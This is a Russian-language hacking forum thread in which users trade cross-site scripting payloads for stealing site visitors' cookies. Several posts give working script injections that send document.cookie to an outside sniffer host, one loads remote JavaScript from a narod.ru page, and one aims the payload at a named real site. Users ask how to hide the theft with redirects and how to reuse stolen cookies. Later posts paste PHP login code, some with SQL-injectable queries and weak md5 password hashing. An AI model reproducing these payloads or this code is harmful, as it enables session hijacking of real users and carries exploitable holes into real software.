Впринципе там всё понятно написано 1 Code: Название сайта жертвы/free?p='><script>img=new Image();img.src="Ссылка на твой снифер(Лучьше всего s.netsec.ru зарегься там) ?"+document.cookie;"+document.cookie;</script> 2 Либо Регишься к примеру на народе тобиш яндекс создаёшь ява скрипт можно воспользоваться редакторо Dremweaver 8 там всё понятно расписано Code: Название сайта жертвы/free?p='><script src=http://Твой ник в народе .narod.ru/js.js></script> Исходник дан в скрипте 2.Более сложный способ!Залить линк на свой снифер через админку , но для этого собственно нужен доступ=) Я сам в принципе новичок у меня всего один раз получалось как банер заливать
в том что не добавил куки. читай там же не просто ссыль дается а ссыль с хищением кук того они тебе и не пришли
АВТОР, не мог бы ты сделать переадресацию?допустим жертва зашла на снифф, все ок и ее перекинуло, скажем на ya.ru так удобнее и как-то скрытнее...а если "куда переадресовывать" еще можно будет настраивать, то тебе просто огромнейшее спасибо!!!!!
Одни вопросы,но сто пудова даже ни кто не прочитал элементарной понятной даже слону https://forum.antichat.ru/thread20140.html.
как то кидал автору в асю пару едеек по поиску и бану сказал что будет всё как время будет а время будет не скоро =)
как использовать сниффер на странице, поняла - картинку вставляешь.... так же, как понимаю, на форумах - в сообщение вставлять картинку???? а в чатах? тупо ссылку на сниффер? чел пройдет, выйдет на картинку размером 1на1???? а еще слышала, что можно перехватывать icq-переписку... расскажите, кто занет. ЗЫ. огромное спасипо за отличный сниффер)))))))
Пара вопросо, извините( Time: 03.01 -04.21.17 //число.месяц - час.минуты.секунды?? IP: *** Host: *** Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; C40; MRA 4.10 (build 01952)) //ие определяется как мозилла?? String: nuid=****//О_о а какого сайта это куки? предыдущего или настоящего?? по статистике народ.ру на сайт заходит порядком больше человек, чем согласно снифферу. может ли посетитель не регистрироваться сниффером, если у него отключены картинки броузером?? могут ли быть еще какие-нибудь причины?
Подскажите плз, чем расшифровать полученные куки? а то весь вечер мучаюсь... весь поиск переюзал, не могу найти негде( как и что(
помогите разобраться,при переходе по ссылке http://dump.ru/search.php?filename='"></script>'"><scRIPt>alert(document.cookie)</sCRIPT> выдаются мои куки, а сылка http://dump.ru/search.php?filename='"></script>'"><scRIPt>img = new Image(); img.src = "http://s.netsec.ru/логин.gif?"+document.cookie;</sCRIPT>, как я понял из вышенаписанного должна (если я по ней перехожу) отправлять мои куки на сниффер, а туда почему-то вообще ничего не приходит, даже айпи! почему так????
1 поскажите как можно расшифровать cookie ну или хотябы их себе подставить. заранее спасибо, плюсом не обижу
Если я не ошибаюсь это можно сделать так register.php PHP: <? // Страница регситрации нового пользователя # Соединямся с БД mysql_connect("localhost", "myhost", "myhost"); mysql_select_db("testtable"); if(isset($_POST['submit'])) { $err = array(); # проверям логин if(!preg_match("/^[a-zA-Z0-9]+$/",$_POST['login'])) { $err[] = "Логин может состоять только из букв английского алфавита и цифр"; } if(strlen($_POST['login']) < 3 or strlen($_POST['login']) > 30) { $err[] = "Логин должен быть не меньше 3-х символов и не больше 30"; } # проверяем, не сущестует ли пользователя с таким именем $query = mysql_query("SELECT COUNT(user_id) FROM users WHERE user_login='".mysql_real_escape_string($_POST['login'])."'"); if(mysql_result($query, 0) > 0) { $err[] = "Пользователь с таким логином уже существует в базе данных"; } # Если нет ошибок, то добавляем в БД нового пользователя if(count($err) == 0) { $login = $_POST['login']; # Убераем лишние пробелы и делаем двойное шифрование $password = md5(md5(trim($_POST['password']))); mysql_query("INSERT INTO users SET user_login='".$login."', user_password='".$password."'"); header("Location: login.php"); exit(); } else { print "<b>При регистрации произошли следующие ошибки:</b><br>"; foreach($err AS $error) { print $error."<br>"; } } } ?> <form method="POST"> Логин <input name="login" type="text"><br> Пароль <input name="password" type="password"><br> <input name="submit" type="submit" value="Зарегистрироваться"> </form> login.php PHP: <? // Страница авторизации # Функция для генерации случайной строки function generateCode($length=6) { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHI JKLMNOPRQSTUVWXYZ0123456789"; $code = ""; $clen = strlen($chars) - 1; while (strlen($code) < $length) { $code .= $chars[mt_rand(0,$clen)]; } return $code; } # Соединямся с БД mysql_connect("localhost", "myhost", "myhost"); mysql_select_db("testtable"); if(isset($_POST['submit'])) { # Вытаскиваем из БД запись, у которой логин равняеться введенному $query = mysql_query("SELECT user_id, user_password FROM users WHERE user_login='".mysql_real_escape_string($_POST['login'])."' LIMIT 1"); $data = mysql_fetch_assoc($query); # Соавниваем пароли if($data['user_password'] === md5(md5($_POST['password']))) { # Генерируем случайное число и шифруем его $hash = md5(generateCode(10)); if(!@$_POST['not_attach_ip']) { # Если пользователя выбрал привязку к IP # Переводим IP в строку $insip = ", user_ip=INET_ATON('".$_SERVER['REMOTE_ADDR']."')"; } # Записываем в БД новый хеш авторизации и IP mysql_query("UPDATE users SET user_hash='".$hash."' ".$insip." WHERE user_id='".$data['user_id']."'"); # Ставим куки setcookie("id", $data['user_id'], time()+60*60*24*30); setcookie("hash", $hash, time()+60*60*24*30); # Переадресовываем браузер на страницу проверки нашего скрипта header("Location: check.php"); exit(); } else { print "Вы ввели неправильный логин/пароль"; } } ?> <form method="POST"> Логин <input name="login" type="text"><br> Пароль <input name="password" type="password"><br> Не прикреплять к IP(не безопасно) <input type="checkbox" name="not_attach_ip"><br> <input name="submit" type="submit" value="Войти"> </form> check.php PHP: <? // Скрипт проверки # Соединямся с БД mysql_connect("localhost", "myhost", "myhost"); mysql_select_db("testtable"); if (isset($_COOKIE['id']) and isset($_COOKIE['hash'])) { $query = mysql_query("SELECT *,INET_NTOA(user_ip) FROM users WHERE user_id = '".intval($_COOKIE['id'])."' LIMIT 1"); $userdata = mysql_fetch_assoc($query); if(($userdata['user_hash'] !== $_COOKIE['hash']) or ($userdata['user_id'] !== $_COOKIE['id']) or (($userdata['user_ip'] !== $_SERVER['REMOTE_ADDR']) and ($userdata['user_ip'] !== "0"))) { setcookie("id", "", time() - 3600*24*30*12, "/"); setcookie("hash", "", time() - 3600*24*30*12, "/"); print "Хм, что-то не получилось"; } else { print "Привет, ".$userdata['user_login'].". Всё работает!"; } } else { print "Включите куки"; } ?> Для защиты формы логина от перебора, можно использовать капчу.
Попробуй этот PHP: if ($_COOKIE["cookie_username"] && $_COOKIE["cookie_password"]) { dbconnect(); $result = mysql_query("SELECT password FROM users WHERE username='$cookie_username'"); if (mysql_num_rows($result) > 0) { $row = mysql_fetch_object($result); if ($row->password == $cookie_password) { $username = $cookie_username; $password = $cookie_password; session_register("username"); session_register("password"); } } }
Человеки помогайте пишу пить до сниффа http://s.netsec.ru/pop.gif?"+documen.cookie; (мэй би ошипка) кароче куки не идут токо общая информация помогите исправле прально а то блин срочно нада куки спереть.....
ты забыл t http://s.netsec.ru/pop.gif?"+document.cookie Прежде чем написать смотрите что рисуете А просто в браузере "Управление куками "и заменить их на подходящие,так что,нельзя?
